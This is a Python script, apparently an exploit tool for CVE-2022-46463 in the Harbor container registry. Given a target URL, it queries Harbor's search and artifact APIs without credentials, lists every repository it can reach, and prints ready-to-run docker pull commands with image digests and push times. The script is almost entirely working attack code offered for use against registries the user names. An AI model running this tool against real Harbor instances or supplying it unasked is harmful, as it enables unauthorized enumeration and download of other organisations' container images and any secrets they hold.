import requests
import urllib.parse
import json
import urllib3
import argparse

urllib3.disable_warnings()


def logger(log="green", text=""):
    colors = {
        "green": "\033[92m",
        "red": "\033[91m",
        "white": "\033[37m",
        "yellow": "\033[33m",
        "blue": "\033[94m",
        "cyan": "\033[96m",
        "banner": "\033[1;36m"
    }
    end = "\033[0m"
    print(f"{colors.get(log, '')}{text}{end}")

def banners():
    logger('banner', '''
 ______  _     _   ______  CVE-2022-46463
| |     | |   | | | |                
| |     \ \   / / | |----            
|_|____  \_\_/_/  |_|____            
                                     
 by: iak3ec  |  https://github.com/nu0l
''')

def arg():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", dest="url", type=str, help="Target Harbor base URL (e.g. https://harbor.example.com)")
    return parser.parse_args()

def get_repositories(base_url):
    url = urllib.parse.urljoin(base_url, "/api/v2.0/search?q=/")
    try:
        res = requests.get(url, verify=False, timeout=10)
        data = res.json()
        return [r['repository_name'] for r in data.get('repository', [])]
    except Exception as e:
        logger('red', f"[!] 获取镜像列表失败: {e}")
        return []

def get_docker_pull_commands(base_url, repo):
    try:
        project, name = repo.split("/", 1)
        api_url = f"{base_url}/api/v2.0/projects/{project}/repositories/{name}/artifacts?page_size=100"
        res = requests.get(api_url, verify=False, timeout=10)
        artifacts = res.json()

        results = []
        for item in artifacts:
            digest = item.get("digest", "")
            push_time = item.get("push_time", "")
            cmd = f"docker pull {base_url.replace('https://', '').replace('http://', '')}/{repo}@{digest}"
            results.append({"cmd": cmd, "time": push_time})
        return results
    except Exception as e:
        logger("red", f"[!] 获取 {repo} 的 artifacts 失败: {e}")
        return []

def main():
    args = arg()
    if not args.url:
        logger("red", "请使用 -u 指定 Harbor 地址")
        return

    base_url = args.url.rstrip('/')
    logger("cyan", f"[✔] Harbor URL: {base_url}")

    repos = get_repositories(base_url)
    logger("green", f"[✔] 共发现 {len(repos)} 个镜像仓库\n")

    for repo in repos:
        pulls = get_docker_pull_commands(base_url, repo)
        if pulls:
            logger("green", f"[✔] Repository: {repo}")
            for item in pulls:
                cmd = item["cmd"]
                push_time = item["time"]
                logger("white", f"    ├─ {cmd}")
                if push_time:
                    logger("yellow", f"    └─ Push Time : {push_time}")
            logger("white", "-" * 70)

if __name__ == '__main__':
    banners()
    main()
